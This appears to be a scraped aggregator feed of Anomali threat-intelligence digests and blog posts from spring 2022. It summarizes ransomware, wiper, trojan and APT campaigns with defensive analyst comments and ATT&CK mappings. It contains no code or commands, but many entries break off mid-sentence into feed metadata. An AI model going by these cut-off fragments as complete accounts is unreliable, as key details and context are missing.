Cobalt Mirage deployed BitLocker ransomware on a US charity systems, and exfiltrated data from a US local government network. Their ransomware operations appear to be a low-scale, hands-on approach with rare tactics such as sending a ransom note to a local printer. The group utilized its own custom binaries including a Fast Reverse Proxy client (FRPC) written in Go. It also relied on mass scanning for known vulnerabilities (ProxyShell, Log4Shell) and using commodity tools for encryption, internal scanning, and lateral movement. Analyst Comment: However small your government or NGO organization is, it still needs protection from advanced cyber actors. Keep your system updated, and employ mitigation strategies when updates for critical vulnerabilities are not available. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Modify Registry - T1112 | [MITRE ATT&CK] Create Account - T1136 | [MITRE ATT&CK] Account Manipulation - T1098 | [MITRE ATT&CK] Proxy - T1090 | [MITRE ATT&CK] Data Encrypted for Impact - T1486 Tags: Cobalt Mirage, Phosphorous, Cobalt Illusion, TunnelVision, Impacket, wmiexec, Softperfect network scanner, LSASS, RDP, Powershell, BitLocker, Ransomware, Fast Reverse Proxy client, FRP, FRPC, Iran, source-country:IR, USA, target-country:US, Cyberespionage, Government, APT, Go, Log4j2, ProxyShell, CVE-2021-34473, CVE-2021-45046, CVE-2021-44228, CVE-2020-12812, CVE-2021-31207, CVE-2018-13379, CVE-2021-34523, CVE-2019-5591 SYK Crypter Distributing Malware Families Via Discord (published: May 12, 2022) Morphisec researchers discovered a new campaign abusing popular messaging platform Discord content distribution network (CDN). If a targeted user activates the phishing attachment, it starts the DNetLoader malware that reaches out to the hardcoded Discord CDN link and downloads a next stage crypter such as newly-discovered SYK crypter. SYK crypter is being loaded into memory where it decrypts its configuration and the next stage payload using hardcoded keys and various encryption methods. It detects and impairs antivirus solutions and checks for d]]> 2022-05-17T15:01:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-costa-rica-in-ransomware-emergency-charming-kitten-spy-and-ransom-saitama-backdoor-hides-by-sleeping-and-more www.secnews.physaphae.fr/article.php?IdArticle=4668209 False Ransomware,Malware,Tool,Vulnerability,Threat,Conference APT 35,APT 15,APT 34 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Attackers Are Attempting to Exploit Critical F5 BIG-IP RCE (published: May 9, 2022) CVE-2022-1388, a critical remote code execution vulnerability affecting F5 BIG-IP multi-purpose networking devices/modules, was made public on May 4, 2022. It is of high severity (CVSSv3 score is 9.8). By May 6, 2022, multiple researchers have developed proof-of concept (PoC) exploits for CVE-2022-1388. The first in-the-wild exploitation attempts were reported on May 8, 2022. Analyst Comment: Update your vulnerable F5 BIG-IP versions 13.x and higher. BIG-IP 11.x and 12.x will not be fixed, but temporary mitigations available: block iControl REST access through the self IP address and through the management interface, modify the BIG-IP httpd configuration. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 Tags: CVE-2022-1388, F5, Vulnerability, Remote code execution, Missing authentication Mobile Subscription Trojans and Their Little Tricks (published: May 6, 2022) Kaspersky researchers analyzed five Android trojans that are secretly subscribing users to paid services. Jocker trojan operators add malicious code to legitimate apps and re-upload them to Google Store under different names. To avoid detection, malicious functionality won’t start until the trojan checks that it is available in the store. The malicious payload is split in up to four files. It can block or substitute anti-fraud scripts, and modify X-Requested-With header in an HTTP request. Another Android malware involved in subscription fraud, MobOk trojan, has additional functionality to bypass captcha. MobOk was seen in a malicious app in Google Store, but the most common infection vector is being spread by other Trojans such as Triada. Analyst Comment: Limit your apps to downloads from the official stores (Google Store for Android), avoid new apps with low number of downloads and bad reviews. Pay attention to the terms of use and payment. Avoid granting it too many permissions if those are not crucial to the app alleged function. Monitor your balance and subscription list. MITRE ATT&CK: [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Data Manipulation - T1565 Tags: Android, Jocker, MobOk, Triada, Vesub, GriftHorse, Trojan, Subscription fraud, Subscription Trojan, Russia, target-country:RU, Middle East, Saudi Arabia, target-country:SA, Egypt, target-country:EG, Thailand, target-country:TH Raspberry Robin Gets the Worm Early (published: May 5, 2022) Since September 2021, Red Canary researchers monitor Raspberry Robin, a new worm]]> 2022-05-10T17:08:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-moshen-dragon-abused-anti-virus-software-raspberry-robin-worm-jumps-from-usb-unc3524-uses-internet-of-things-to-steal-emails-and-more www.secnews.physaphae.fr/article.php?IdArticle=4573852 False Ransomware,Malware,Tool,Vulnerability,Threat APT 29,APT 28 3.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence A Lookback Under the TA410 Umbrella: Its Cyberespionage TTPs and Activity (published: April 28, 2022) ESET researchers found three different teams under China-sponsored umbrella cyberespionage group TA410, which is loosely linked to Stone Panda (APT10, Chinese Ministry of State Security). ESET named these teams FlowingFrog, JollyFrog, and LookingFrog. FlowingFrog uses the Royal Road RTF weaponizer described by Anomali in 2019. Infection has two stages: the Tendyron implant followed by a very complex FlowCloud backdoor. JollyFrog uses generic malware such as PlugX and QuasarRAT. LookingFrog’s infection stages feature the X4 backdoor followed by the LookBack backdoor. Besides using different backdoors and exiting from IP addresses located in three different districts, the three teams use similar tools and similar tactics, techniques, and procedures (TTPs). Analyst Comment: Organizations should keep their web-facing applications such as Microsoft Exchange or SharePoint secured and updated. Educate your employees on handling suspected spearphishing attempts. Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from APTs, including a focus on both network and host-based security. Prevention and detection capabilities should also be in place. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Native API - T1106 | [MITRE ATT&CK] Shared Modules - T1129 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Inter-Process Communication - T1559 | [MITRE ATT&CK] Windows Management Instrumentation - T1047 | [MITRE ATT&CK] Scheduled Task - T1053 | [MITRE ATT&CK] Server Software Component - T1505 | [MITRE ATT&CK] Create or Modify System Process - T1543 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Masquerading - T1036 | [MITRE ATT&CK] Masquerading - T1036 | [MITRE ATT&CK] Rootkit - T1014 | [MITRE ATT&CK] Process Injection - T1055 | ]]> 2022-05-03T16:31:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-time-to-ransom-under-four-hours-mustang-panda-spies-on-russia-ricochet-chollima-sends-goldbackdoor-to-journalists-and-more www.secnews.physaphae.fr/article.php?IdArticle=4538825 False Ransomware,Malware,Tool,Vulnerability,Threat,Guideline,Cloud APT 10,APT 10,APT 37 None Anomali - Firm Blog Cybersecurity Insights Report 2022: The State of Cyber Resilience. In the last blog, I wrote about the challenges that organizations have with disparate tools, highlighted by the fact that mature enterprise organizations deployed over 130 security tools on average. That blog is a perfect introduction to number five on our list of challenges enterprise organizations face: ‘Solutions not customized to the types of risks we face.’ More Tools, More Problems Most security teams use several security management tools to help them manage their security infrastructure. While each tool was acquired for a specific reason and purpose, introducing each tool into an existing security tech stack poses a different challenge. Unfortunately, there’s no one size fits all approach. Every new security tool introduced requires integration to use the tool effectively. It takes a lot of time and effort to implement a tool properly into your environment and processes. There would most likely need training involved for those analysts who would be using the new tools. While necessary, these tasks take time and attention away from everyday activities and can significantly decrease a security team’s effectiveness before they’re fully integrated into their workflow. Increasing in Multiple Tools Increases Security Complexity The increasing adoption of cybersecurity solutions has created more consequences and challenges for organizations and their IT teams. With each addition of a new solution, another problem emerges Tool sprawl. Tool sprawl is when an organization invests in various tools that make it harder for IT teams to manage and orchestrate the solution. Time is a precious commodity, especially in cybersecurity. It takes time to collect information from multiple tools and disparate data sources, then correlate it manually with the necessary intelligence. Instead of responding quickly to an attack, analysts will waste time collecting the data and relevant intelligence needed to understand what kind of attacks they are dealing with and which actions they should take. Instead of fixing a problem, security teams may suddenly find that they’ve added more.  How Cybersecurity Tools Grew Out of Control Traditional cybersecurity operations were designed to manage anti-viruses, install and monitor firewalls, protect data, and help users manage passwords. It was evident by the mid-1990s that investing in cybersecurity would be necessary. Organizations now had a budget for security and had to figure out which parts of their infrastructure were most vulnerable. As their strategy evolved, organizations began investing in hiring cybersecurity experts but realized people are expensive. They then began buying various tools to complement their security professionals. They soon realized that there was a security tool you could buy that could help resolve the situation for any potential problem. The desire to throw tools at a situation continues today. Cybersecurity budgets have increased since the pandemic sped up digital transformation efforts and increased an organization’s attack surface. Board members and Executives realize the need to invest more in cybersecurity. New security products continue to spring up, promising to solve problems and secure all the various parts of businesses’ technology stacks.  Unfortunately, when adding tools, too many organizations make the mistake of looking for a quick fix, working in silos to solve one problem rather than t]]> 2022-04-28T11:00:00+00:00 https://www.anomali.com/blog/more-tools-more-problems-why-its-important-to-ensure-security-tools-work-together www.secnews.physaphae.fr/article.php?IdArticle=4516458 False Tool,Threat,Guideline None None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence SocGholish and Zloader – From Fake Updates and Installers to Owning Your Systems (published: April 25, 2022) Cybereason researchers have compared trending attacks involving SocGholish and Zloader malware. Both infection chains begin with social engineering and malicious downloads masquerading as legitimate software, and both lead to data theft and possible ransomware installation. SocGholish attacks rely on drive-by downloads followed by user execution of purported browser installer or browser update. The SocGholish JavaScript payload is obfuscated using random variable names and string manipulation. The attacker domain names are written in reverse order with the individual string characters being put at the odd index positions. Zloader infection starts by masquerading as a popular application such as TeamViewer. Zloader acts as information stealer, backdoor, and downloader. Active since 2016, Zloader actively evolves and has acquired detection evasion capabilities, such as excluding its processes from Windows Defender and using living-off-the-land (LotL) executables. Analyst Comment: All applications should be carefully researched prior to installing on a personal or work machine. Applications that request additional permissions upon installation should be carefully vetted prior to allowing permissions. Additionally, all applications, especially free versions, should only be downloaded from trusted vendors. MITRE ATT&CK: [MITRE ATT&CK] Drive-by Compromise - T1189 | [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Windows Management Instrumentation - T1047 | [MITRE ATT&CK] Masquerading - T1036 | [MITRE ATT&CK] Process Injection - T1055 | [MITRE ATT&CK] Signed Binary Proxy Execution - T1218 | [MITRE ATT&CK] Credentials from Password Stores - T1555 | [MITRE ATT&CK] Steal or Forge Kerberos Tickets - T1558 | [MITRE ATT&CK] Steal Web Session Cookie - T1539 | [MITRE ATT&CK] Unsecured Credentials - T1552 | [MITRE ATT&CK] Remote System Discovery - T1018 | [MITRE ATT&CK] System Owner/User Discovery - T1033 | ]]> 2022-04-26T16:24:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-gamaredon-delivers-four-pterodos-at-once-known-plaintext-attack-on-yanlouwang-encryption-north-korea-targets-blockchain-industry-and-more www.secnews.physaphae.fr/article.php?IdArticle=4508976 False Ransomware,Malware,Tool,Vulnerability,Threat,Guideline,Medical APT 38,Uber,APT 28 None Anomali - Firm Blog Cybersecurity Insights Report 2022: The State of Cyber Resilience: Lack of integrated cyber-security solutions. To deal with the cyberthreats they face every day, Enterprise Security Decision Makers seek new and well-supported solutions. They look for solutions that are easy to use and integrate with other cybersecurity systems and different parts of their organizations. 44% of those surveyed said that easily integrating with other cybersecurity tools is essential when evaluating cybersecurity solutions. What do you look for?   initIframe('62573c84d0742a0929d79352');   So why do almost half of enterprise decision-makers want easily integrated tools? Enterprises frequently deploy new security tools and services to address changing needs and an increase in threats. In fact, according to recent findings, mature security organizations have deployed on average: Small business: 15 and 20 security tools Medium-sized companies: 50 to 60 security tools Enterprises: over 130 tools security tools If you like math, check out these stats: A typical six-layer enterprise tech stack, composed of networking, storage, physical servers, virtualization, management, and application layers, causes enterprise organizations to struggle with 1.6 billion versions of tech installations for 336 products by 57 vendors. Increasing Investments Our research showed that 74% of organizations had increased their cybersecurity budgets to help defend against increasing cyber-attacks. Despite these increasing investments in cybersecurity, only 46% are very confident that their cyber-protection technologies can detect today’s sophisticated attacks. While investment is on the uptake, effectiveness is not. Response efforts have been hindered by the complexity caused by fragmented toolsets, highlighting that investing in too many tools can reduce the effectiveness of security defenses. More Tools, More Problems The wide variety of tools enterprises invest their time and money into to combat security threats can create numerous issues. Security analysts are understandably frustrated. They’re spending most of their time chasing false positives and performing manual processes born from these disparate toolsets. They’re working longer hours and are under more pressure to protect the business. CSO Online provides a good article listing the top challenges of security tool integration: 7 top challenges of security tool integration | CSO Online Too many security tools Lack of interoperability among security tools Broken functionality Limited network visibility Increase in false alarms Failure to set expectations properly Lack of skills You can find the full article here. Source: csoonline.com For this blog, I’ll focus on what I think is the biggest challenge the article did not mention: Disparate tools create siloed organizations.  Creating Gaps and Silos In the last ]]> 2022-04-14T11:00:00+00:00 https://www.anomali.com/blog/more-is-less-the-challenge-of-utilizing-multiple-security-tools www.secnews.physaphae.fr/article.php?IdArticle=4446501 False Tool,Threat,Guideline None None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence New SolarMaker (Jupyter) Campaign Demonstrates the Malware’s Changing Attack Patterns (published: April 8, 2022) Palo Alto Researchers have released their technical analysis of a new version of SolarMaker malware. Prevalent since September 2020, SolarMaker’s initial infection vector is SEO poisoning; creating malicious websites with popular keywords to increase their ranking in search engines. Once clicked on, an encrypted Powershell script is automatically downloaded. When executed, the malware is installed. SolarMaker’s main functionality is the theft of web browser information such as stored passwords, auto-fill data, and saved credit card information. All the data is sent back to an encoded C2 server encrypted with AES. New features discovered by this technical analysis include increased dropper file size, droppers are always signed with legitimate certificates, a switch back to executables instead of MSI files. Furthermore, the backdoor is now loaded into the dropper process instead of the Powershell process upon first time execution. Analyst Comment: Never click on suspicious links, always inspect the url for any anomalies. Untrusted executables should never be executed, nor privileges assigned to them. Monitor network traffic to assist in the discovery of non standard outbound connections which may indicate c2 activity. MITRE ATT&CK: [MITRE ATT&CK] Data Obfuscation - T1001 | [MITRE ATT&CK] Encrypted Channel - T1573 | [MITRE ATT&CK] Exfiltration Over C2 Channel - T1041 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Virtualization/Sandbox Evasion - T1497 Tags: SolarMaker, Jupyter, Powershell, AES, C2, SEO poisoning Google is on Guard: Sharks shall not Pass! (published: April 7, 2022) Check Point researchers have discovered a series of malicious apps on the Google Play store that infect users with the info stealer Sharkbot whilst masquerading as AV products. The primary functionality of Sharkbot is to steal user credentials and banking details which the user is asked to provide upon launching the app. Furthermore, Sharkbot asks the user to permit it a wide array of permissions that grant the malware a variety of functions such as reading and sending SMS messages and uninstalling other applications. Additionally, the malware is able to evade detection through various techniques. Sharkbot is geofenced, therefore it will stop functioning if it detects the user is from Belarus, China, India, Romania, Russia or Ukraine. Interestingly for Android malware, Sharkbot also utilizes domain generation algorithm (DGA). This allows the malware to dynamically generate C2 domains to help the malware function after a period of time even i]]> 2022-04-12T19:06:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-zyxel-patches-critical-firewall-bypass-vulnerability-spring4shell-cve-2022-22965-the-caddywiper-malware-attacking-ukraine-and-more www.secnews.physaphae.fr/article.php?IdArticle=4436863 False Malware,Tool,Vulnerability,Threat,Patching APT-C-23 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence AcidRain | A Modem Wiper Rains Down on Europe (published: March 31, 2022) On February 24, 2022, Viasat KA-SAT modems became inoperable in Ukraine after threat actors exploited a misconfigured VPN appliance, compromised KA-SAT network, and were able to execute management commands on a large number of residential modems simultaneously. SentinelOne researchers discovered that a specific Linux wiper, dubbed AcidRain, likely used in that attack as it shows the same targeting and the same overwriting method that was seen in a Viasat’s Surfbeam2 modem targeted in the attack. AcidRain shows code similarities with VPNFilter stage 3 wiping plugin called dstr, but AcidRain’s code appears to be sloppier, so the connection between the two is still under investigation. Analyst Comment: Internet service providers are heavily targeted due to their trust relationships with their customers and they should harden their configurations and access policies. Devices targeted by AcidRain can be brought back to service through flash memory/factory reset. Organizations exposed to Russia-Ukrainian military conflict should plan for backup options in case of a wiper attack. MITRE ATT&CK: [MITRE ATT&CK] Data Destruction - T1485 | [MITRE ATT&CK] System Shutdown/Reboot - T1529 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Supply Chain Compromise - T1195 Tags: AcidRain, Viasat KA-SAT, Russia, Ukraine, Germany, target-country:UA, target-country:DE, Wiper, Modem, Supply-chain compromise, VPN appliance, VPNFilter BlackCat Ransomware (published: March 31, 2022) BlackCat (ALPHV) ransomware-as-a-service surfaced on Russian-speaking underground forums in late 2021. The BlackCat ransomware is perhaps the first ransomware written entirely in Rust, and is capable of targeting both Windows and Linux machines. It targeted multiple industries in the US, Europe, the Philippines, and other regions, and Polyswarm researchers expect it to expand its operations. It is attributed to the BlackMatter/DarkSide ransomware threat group. BlackCat used some known BlackMatter infrastructure and shared the same techniques: reverse SSH tunnels and scheduled tasks for persistence, LSASS for credential access, lmpacket, RDP, and psexec for command and control. Analyst Comment: It is crucial for your company to ensure that servers are always running the most current software version. Your company should have policies in place in regards to the proper configurations needed for your servers in order to conduct your business needs safely. Additionally, always practice Defense in Depth (do not rely on single security mechanisms - security measures should be layered, redundant, and failsafe). Furthermore, a business continuity plan should be in place in the case of a]]> 2022-04-05T18:17:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-acidrain-wiped-viasat-modems-blackmatter-rewritten-into-blackcat-ransomware-saintbear-goes-with-go-and-more www.secnews.physaphae.fr/article.php?IdArticle=4400992 False Ransomware,Malware,Tool,Vulnerability,Threat,Guideline VPNFilter,VPNFilter None Anomali - Firm Blog Cybersecurity Insights Report 2022: The State of Cyber Resilience.  Coming in at number seven on our Top 10 List of the Challenges Cybersecurity Professionals Face is "Lack of ability to share threat intelligence cross-functionally." In an August blog, I wrote about President Biden’s Executive Order that sought to ensure that IT service providers share threat information about incidents with the federal government and collect and preserve data that could aid threat detection, investigation, and response. My comment was that before we share information as an industry, organizations need to break down their silos to share threat intelligence internally. It was not surprising to see this surface as one of the Top 10 Challenges organizations face. (I know, a clock is right twice a day, too, I’m taking the win here. Even if no one else is reading, I enjoy writing these.) Digital transformation has quickly expanded attack surfaces. Now more than ever, global organizations must balance a rapidly evolving cybersecurity threat landscape against business requirements. Threat information sharing is critical for security teams and organizations to protect themselves from cyber-attacks. The problem with sharing threat intelligence is that most organizations don’t know where to start. Enter Cyber Fusion Thirty years ago, military intelligence organizations developed the concept of cyber fusion, which combines HUMINT (human Intelligence) with COMINT (computer intelligence). They used the idea to collaborate with different intelligence communities and gain an in-depth understanding of the threat landscape. Cyber fusion is becoming increasingly popular in the cybersecurity industry, with organizations creating cyber fusion centers or using technologies like threat intelligence management or XDR (extended detection and response) solutions to eliminate silos, enhance threat visibility, and increase cyber resilience and collaboration between security teams. Cyber fusion offers a unified approach to cybersecurity by combining the intelligence from different teams into one cohesive picture. It also helps to integrate contextualized strategic, tactical, and operational threat intelligence for immediate threat prediction, detection, and analysis. How to Start Sharing Threat Intelligence Internally Cyber fusion takes a proactive approach to cybersecurity that helps organizations break down barriers and open communications across their entire organization to help them identify and address cyber risks before they become an issue. A cyber fusion approach helps foster collaboration among different departments within the company to focus on areas that ensure protection against relevant threats. By getting more people involved in keeping up with security issues and cyber incidents, organizations can ensure their investments and resources focus right where they need to be. Click on the image below to download our new ebook to learn more about how you can utilize cyber fusion to help break down silos within your organization. ]]> 2022-03-31T10:00:00+00:00 https://www.anomali.com/blog/the-need-to-share www.secnews.physaphae.fr/article.php?IdArticle=4371921 False Tool,Threat,Guideline None None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Hive Ransomware Ports Its Linux VMware ESXi Encryptor to Rust (published: March 27, 2022) The Hive ransomware operators actively copy features first introduced in the BlackCat/ALPHV ransomware to make their ransomware samples more efficient and harder to reverse engineer. They have converted all their builds (targeting Windows, Linux, VMware ESXi) from Golang to the Rust programming language. They also moved from storing the victim's Tor negotiation page credentials in the encryptor executable to requiring the attacker to supply the user name and login password as a command-line argument when launching the malware. Analyst Comment: Ransomware is an evolving threat, and the most fundamental defense is having proper backup processes in place. Follow the 1-2-3 rule: 3 copies, 2 devices, and 1 stored in a secure location. Data loss is manageable as long as regular backups are maintained. MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information - T1140 Tags: Hive, Ransomware, BlackCat, VMware ESXi, Rust, Tor US Says Kaspersky Poses Unacceptable Risk to National Security (updated: March 25, 2022) On March 25, 2022, the US Federal Communications Commission (FCC) added three new entities to its Covered List: China Mobile International USA Inc., China Telecom (Americas) Corp, and AO Kaspersky Labs. The action is aimed to secure US networks from threats posed by Chinese and Russian state-backed entities seeking to engage in espionage and otherwise harm America’s interests. Previously the FCC Covered List had five Chinese entities added in March 2021 including Huawei and ZTE. Kaspersky denied the allegations and stressed that the company “will continue to assure its partners and customers on the quality and integrity of its products, and remains ready to cooperate.” Earlier the same day, HackerOne blocked Kaspersky from its bug bounty program. Analyst Comment: It seems that the FCC decision does not directly affect private parties using Kaspersky antivirus and other security products. There is no public data showing directly that Kaspersky is currently involved in cyberespionage or some malware distribution activity, but such suspicions were raised in previous years. Direct connections of Kaspersky to Russia and its own Federal Security Services (FSB) makes it both a potential security risk and a reputation risk as the military conflict in Ukraine leads to new sanctions and increased cyber activity. Tags: Russia, USA, China, Ukraine, Kaspersky, FCC, FSB, Huawei, ZTE, China Mobile, China Telecom ]]> 2022-03-29T18:14:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-north-korean-apts-used-chrome-zero-day-russian-energy-sector-scada-targeting-unsealed-lapsus-breached-microsoft-finally-arrested-and-more www.secnews.physaphae.fr/article.php?IdArticle=4361473 False Ransomware,Malware,Tool,Vulnerability,Threat,Guideline None 5.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Double Header: IsaacWiper and CaddyWiper (published: March 18, 2022) Data destruction is one of the common objectives for Russia in its ongoing cyberwar with Ukraine. During the February-March 2022 military escalation, three new wipers were discovered. On February 23, 2022, HermeticWiper, on February 24, 2022, IsaacWiper, and, later in March 2022, CaddyWiper. Malwarebytes researchers assess that all three wipers have been written by different authors and have no code overlap. IsaacWiper and CaddyWiper are light in comparison to the more complex HermeticWiper. CaddyWiper has an additional check to exclude wiping Domain Controllers probably to leave an opportunity for malware propagation. Analyst Comment: Focus on intrusion prevention and having a proper disaster recovery plan in place: have anti-phishing training, keep your systems updated, regularly backup your data to an offline storage. MITRE ATT&CK: [MITRE ATT&CK] Data Destruction - T1485 Tags: CaddyWiper, IsaacWiper, HermeticWiper, Wiper, Data destruction, Russia, Ukraine, Ukraine-Russia Conflict 2022, Operation Bleeding Bear UAC-0035 (InvisiMole) Attacks Ukrainian Government Organizations (published: March 18, 2022) The Computer Emergency Response Team for Ukraine (CERT-UA) detected a new UAC-0035 (InvisiMole) phishing campaign targeting Ukrainian government organizations. InvisiMole is likely a subgroup connected to the Russia-sponsored Gamaredon (Primitive Bear) group. The new campaign features an attached archive, together with a shortcut (LNK) file. If the LNK file is opened, an HTML Application file (HTA) downloads and executes VBScript designed to deploy the LoadEdge backdoor. LoadEdge deploys additional malware and modules including TunnelMole, malware that abuses the DNS protocol to form a tunnel for malicious software distribution, and RC2CL backdoor module. Analyst Comment: Users should be trained to recognize spearphishing attempts. Attachments with rare attachment extensions (LNK, ISO, BAT to name a few) should be reported. MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] Protocol Tunneling - T1572 | [MITRE ATT&CK] Modify Registry - T1112 | [MITRE ATT&CK] User Execution - T1204 Tags: InvisiMole, UAC-0035, TunnelMole, Gamaredon, Primitive Bear, Russia, Ukraine, LNK, HTA, DNS, Ukraine-Russia Conflict 2022, Operation Bleeding Bear Exposing Initial Access Broker with Ties to Co]]> 2022-03-22T16:58:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-russia-targets-ukraine-with-new-malware-targeted-phishing-campaigns-give-way-to-wizard-spider-certificates-stolen-by-lapsus-are-being-abused-and-more www.secnews.physaphae.fr/article.php?IdArticle=4324623 False Ransomware,Malware,Tool,Vulnerability,Threat None 4.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Webinar on Cyberattacks in Ukraine – Summary and Q&A (published: March 14, 2022) As the military conflict in Ukraine continues, the number of cyberattacks in Ukraine is expected to rise in the next six months, according to Kaspersky researchers. Most of the current attacks on Ukraine are of low complexity, but advanced persistent threat (APT) attacks exist too. Gamaredon (Primitive Bear) APT group continues its spearphishing attacks. Sandworm APT targets SOHO network devices with modular Linux malware Cyclops Blink. Other suspected APT campaigns use MicroBackdoor malware or various wipers and fake ransomware (HermeticRansom, HermeticWiper, IsaacWiper, WhisperGate). Honeypot network in Ukraine detected over 20,000 attacking IP addresses, and most of them were seen attacking Ukraine exclusively. Analyst Comment: Harden your infrastructure against DDoS attacks, ransomware and destructive malware, phishing, targeted attacks, supply-chain attacks, and firmware attacks. Install all the latest patches. Install security software. Consider strict application white-listing for all machines. Actively hunt for attackers inside the company’s internal network using the retrospective visibility provided by Anomali XDR. MITRE ATT&CK: [MITRE ATT&CK] Shared Modules - T1129 | [MITRE ATT&CK] Data Encoding - T1132 | [MITRE ATT&CK] Pre-OS Boot - T1542 | [MITRE ATT&CK] Fallback Channels - T1008 | [MITRE ATT&CK] Application Layer Protocol - T1071 | [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Disk Content Wipe - T1488 | [MITRE ATT&CK] Inhibit System Recovery - T1490 Tags: Gamaredon, Sandworm, MicroBackdoor, Hades, HermeticWiper, HermeticRansom, IsaacWiper, Pandora, Cyclops Blink, Government, Russia, Ukraine, UNC1151, Ghostwriter, Belarus, Ukraine-Russia Conflict 2022, Operation Bleeding Bear Alert (AA21-265A) Conti Ransomware (Updated) (published: March 9, 2022) The U.S. Cybersecurity and Infrastructure Security Agency (CISA), with assistance from the U.S. Secret Service has updated the alert on Conti ransomware with 98 domain names used in malicious operations. Conti ransomware-as-a-service (RaaS) operation is attributed to the threat group Wizard Spider also known for its Trickbot malware. The group’s internal data and communications were leaked at the end of February 2022 after they announced support for Russia over the conflict in Ukraine. Analyst Comment: Despite the increased attention to Conti ransomware group, it remains extremely active. Ensure t]]> 2022-03-15T16:46:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-government-and-financially-motivated-targeting-of-ukraine-conti-ransomware-active-despite-exposure-carbanak-abuses-xll-files-and-more www.secnews.physaphae.fr/article.php?IdArticle=4285837 False Ransomware,Malware,Tool,Vulnerability,Threat APT 28 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the attached IOCs and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Samsung Confirms Galaxy Source Code Breach but Says no Customer Information was Stolen (published: March 7, 2022) South American threat actor group Lapsus$ posted snapshots and claimed it had stolen 190GB of confidential data, including source code, from the South Korean tech company Samsung. On March 7, 2022, Samsung confirmed that the company recently suffered a cyberattack, but said that it doesn't anticipate any impact on its business or customers. Earlier, in February 2022, Lapsus$ had stolen 1TB data from GPU giant Nvidia and tried to negotiate with the company. Analyst Comment: Companies should implement cybersecurity best practices to guard their source code and other proprietary data. Special attention should be paid to workers working from home and the security of contractors who have access to such data. Tags: Lapsus$, South Korea, South America, Data breach Beware of Malware Offering “Warm Greetings From Saudi Aramco” (published: March 5, 2022) Malwarebytes researchers discovered a new phishing campaign impersonating Saudi Aramco and targeting oil and gas companies. The attached pdf file contained an embedded Excel object which would download a remote template that exploits CVE-2017-11882 to download and execute the FormBook information stealer. Analyst Comment: Organizations should train their users to recognize and report phishing emails. To mitigate this Formbook campaign, users should not handle emails coming from outside of the organization while being logged on with administrative user rights. MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] Template Injection - T1221 Tags: FormBook, CVE-2017-11882, Oil And Gas, Middle East, Saudi Aramco, Excel, Phishing, Remote template Paying a Ransom Doesn’t Put an End to the Extortion (published: March 2, 2022) Venafi researchers conducted a survey regarding recent ransomware attacks and discovered that 83% of successful ransomware attacks include additional extortion methods, containing: threatening to extort customers (38%), stolen data exposure (35%), and informing customers that their data has been stolen (32%). 35% of those who paid the ransom were still unable to recover their data, 18% of victims had their data exposed despite the fact that they paid the ransom. Analyst Comment: This survey shows that ransomware payments are not as reliable in preventing further damages to the victimized organization as previously thought. Educate employees on t]]> 2022-03-08T18:54:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-daxin-hides-by-hijacking-tcp-connections-belarus-targets-ukraine-and-poland-paying-a-ransom-is-not-a-guarantee-and-more www.secnews.physaphae.fr/article.php?IdArticle=4246895 False Ransomware,Malware,Tool,Threat None None Anomali - Firm Blog Figure 1 - IOC 